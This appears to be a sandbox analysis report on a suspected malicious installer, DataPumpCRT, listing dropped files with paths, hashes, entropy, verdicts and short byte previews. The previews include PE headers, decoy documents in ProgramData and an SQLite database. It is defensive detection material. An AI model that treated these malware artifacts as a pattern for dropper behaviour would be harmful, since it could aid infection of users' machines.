Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................\|...................idata...%.......&...\|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\is-TQTTT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	data
Category:	dropped
Size (bytes):	273342460
Entropy (8bit):	0.21522249515446643
Encrypted:	false
SSDEEP:
MD5:	283272AEB1EBB5E66F986E7045E1F29C
SHA1:	EA661C684429BFC89BEDF9941AFE1851168CFB9C
SHA-256:	5EDD559F60CE070CA6D3A5B766238A49EB99EE02B07CED0141B8AA5DB9FFD560
SHA-512:	3EF692D627FAF41588111B36799466C59B79E170558C8FBEA131EE5EF3D5A19BD10517C971A08DDD23C3DA4E4279F087EF11C230DF1A04CD844DF85E0D4DF0E7
Malicious:	false
Reputation:	unknown
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..#m..pm..pm..p..po..p..pn..p..pg..p..pf..p..po..pm..p...p..py..pm..pk..p..p@..p[.pl..p...pl..pRichm..p................PE..L....".e..................%.........&2$.......%...@..........................0K...............................................+.......2.8.............................................................................%.\............................text.....%.......%................. ..`.rdata...M....%..P....%.............@..@.data...DZ... +...... +.............@....rsrc...8.....2......02.............@..@.flang........;......@;.............`...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\stuff\date.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Reputation:	unknown
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\DataPumpCRT\stuff\is-HNIDI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Reputation:	unknown
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\DataPumpCRT\stuff\is-QNUMM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Reputation:	unknown
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\DataPumpCRT\stuff\is-SIKMI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Reputation:	unknown
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\DataPumpCRT\stuff\is-V3HNM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Reputation:	unknown
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\DataPumpCRT\stuff\tagsreplace.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Reputation:	unknown
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\DataPumpCRT\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	InnoSetup Log DataPumpCRT, version 0x30, 8046 bytes, 192799\user, "C:\Program Files (x86)\DataPumpCRT"
Category:	dropped
Size (bytes):	8046
Entropy (8bit):	5.09127055920813
Encrypted:	false
SSDEEP:
MD5:	BF44B2DCB98A7432A35B903CA51F3ADE
SHA1:	AB6AEA40C9090307FBD780A604CE2904AF3D17AA
SHA-256:	C7636ED95C6A82EA95870D35754C55A374F66C845E90FC3AE450589B2E72D471
SHA-512:	FD6B6F5D3BD77325C83168B8E1691E699FC29F07FF914F2EF2EC73947C78D49EE344D3666237F1F40660C5D8F23E9499AC58490B4D6404BC9D0F6EAEC39CC93E
Malicious:	false
Reputation:	unknown
Preview:	Inno Setup Uninstall Log (b)....................................DataPumpCRT.....................................................................................................................DataPumpCRT.....................................................................................................................0...B...n...%...............................................................................................................F............-........B....192799.user"C:\Program Files (x86)\DataPumpCRT...........9.&.... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystem

C:\Program Files (x86)\DataPumpCRT\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	715038
Entropy (8bit):	6.505047376817153
Encrypted:	false
SSDEEP:
MD5:	BFA161AB7F837D65C7405ACA3AAFC240
SHA1:	6B1D618EF801B6135BF193A49F8749D0864CC390
SHA-256:	D2960019D9F83C67726BF9FDB864BDF24A57F9B66A7C4E3AEE77617D73EC883E
SHA-512:	9B33EBA0A642BB3EE9A8851E520D2CE281FA31015AAC2647584A7B2AB26837C65ADF1B031B81D557602545D46EF3F33FA1D5BE64809F25453F48BBA06ECEDB2D
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................\|...................idata...%.......&...\|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

C:\ProgramData\AIXACVYBSB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Reputation:	unknown
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\ProgramData\BPMLNOBVSB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Reputation:	unknown
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\ProgramData\BPMLNOBVSB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Reputation:	unknown
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\ProgramData\BXAJUJAOEO.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701111373123985
Encrypted:	false
SSDEEP:
MD5:	CA5A3E2A0C2DDF92EABE165672425976
SHA1:	1933AC1A510945A766039E7E61D7DA4156E0F074
SHA-256:	4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
SHA-512:	64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
Malicious:	false
Reputation:	unknown
Preview:	BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

C:\ProgramData\CFHIIEHJKKECGCBFIIJD

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Reputation:	unknown
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\ProgramData\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Reputation:	unknown
